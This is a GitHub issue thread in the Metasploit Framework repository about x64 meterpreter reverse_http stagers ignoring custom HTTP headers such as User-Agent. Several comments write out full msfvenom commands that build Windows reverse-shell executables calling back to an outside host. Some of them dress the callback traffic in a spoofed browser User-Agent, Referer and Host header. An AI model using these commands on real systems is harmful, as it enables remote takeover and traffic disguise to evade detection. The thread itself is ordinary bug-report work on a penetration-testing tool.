### ISSUE TITLE
X64 stager with custom http header not works.

### ISSUE THREAD

**Issue by wo4haoren** [rapid7/metasploit-framework#13410]
## Steps to reproduce

How'd you do it?

NOT WORKS :
msfvenom -p windows/x64/meterpreter/reverse_http  LHOST=1.1.1.1 LPORT=80 LURI=/index/64 HttpCookie='init=yes'  -f exe  -o /tmp/stager.exe

WORKS :
msfvenom -p windows/meterpreter/reverse_http  LHOST=1.1.1.1 LPORT=80 LURI=/index/32 HttpCookie='init=yes'  -f exe  -o /tmp/stager.exe

## Expected behavior

X64 stager makes http request custom headers.

## Current behavior

No http requests

### Metasploit version

v5.0.83

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [x] Source install (please specify ruby version)

ruby version : 2.6.5
### OS

alpine3.10

**Comment by OJ** [comment]
What doesn't work? The payload doesn't generate? The payload runs but crashes? The payload runs but doesn't include the header?

More information than "it doesn't work" would be great.

**Comment by wo4haoren** [comment]
Sorry for limit info
"It doesn't work" means stager does not send the first http request.  I have found when arch is x64 and exitfun=process then the stager can runs but no http request is made. I set exitfun to thread and it fixed. So just forget it .

But after digged more deeper I found another problem:

I use this command line to generate a x64 payload :
`msfvenom -p windows/x64/meterpreter/reverse_http  LHOST=1.1.1.1 LPORT=80 LURI=/index/32 HttpUserAgent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36' HttpReferer='https://www.google.com' Ht
tpCookie='init=yes' HttpHostHeader='www.test.com' -f exe exitfunk=thread -o /home/msf/output/http64.exe`

It works but without User-Agent header:
![image](https://user-images.githubusercontent.com/61932870/81356750-870e9d00-9104-11ea-9dda-b9787a220f09.png)

X86 payload is working fine which is generated by this command line :
`msfvenom -p windows/meterpreter/reverse_http  LHOST=1.1.1.1 LPORT=80 LURI=/index/32 HttpUserAgent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36' HttpReferer='https://www.google.com' HttpCo
okie='init=yes' HttpHostHeader='www.test.com' -f exe exitfunk=thread -o /home/msf/output/http32.exe`
![image](https://user-images.githubusercontent.com/61932870/81357195-9215fd00-9105-11ea-8769-cc91aae70113.png)

So is this a bug ?

**Comment by OJ** [comment]
Thank you that's very helpful. Yes this looks like a bug, I'll take a look.

**Comment by HanseSecure** [comment]
The bug is still present

**Comment by dembarthe** [comment]
The bug is still present as per version 6.4.59-dev
`windows/meterpreter/reverse_http` correctly provides the User-Agent (`HttpUserAgent` parameter) when performing the initial stage request, while windows/x64/meterpreter/reverse_http does not.

It is also to be noted, that `windows/meterpreter/reverse_winhttp` (note the winhttp), also does not take into account the User-Agent.

`msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=mydomain.com LPORT=80 LURI="/resources" HttpReferer="www.amazon.com" HttpUserAgent="Gecko" -f exe -o test.exe`
`grep "Gecko" test.exe` does not find anything, and the header is not included when using Wireshark.

To summarize, only `windows/meterpreter/reverse_http` has the HttpUserAgent parameter working in the stage request.
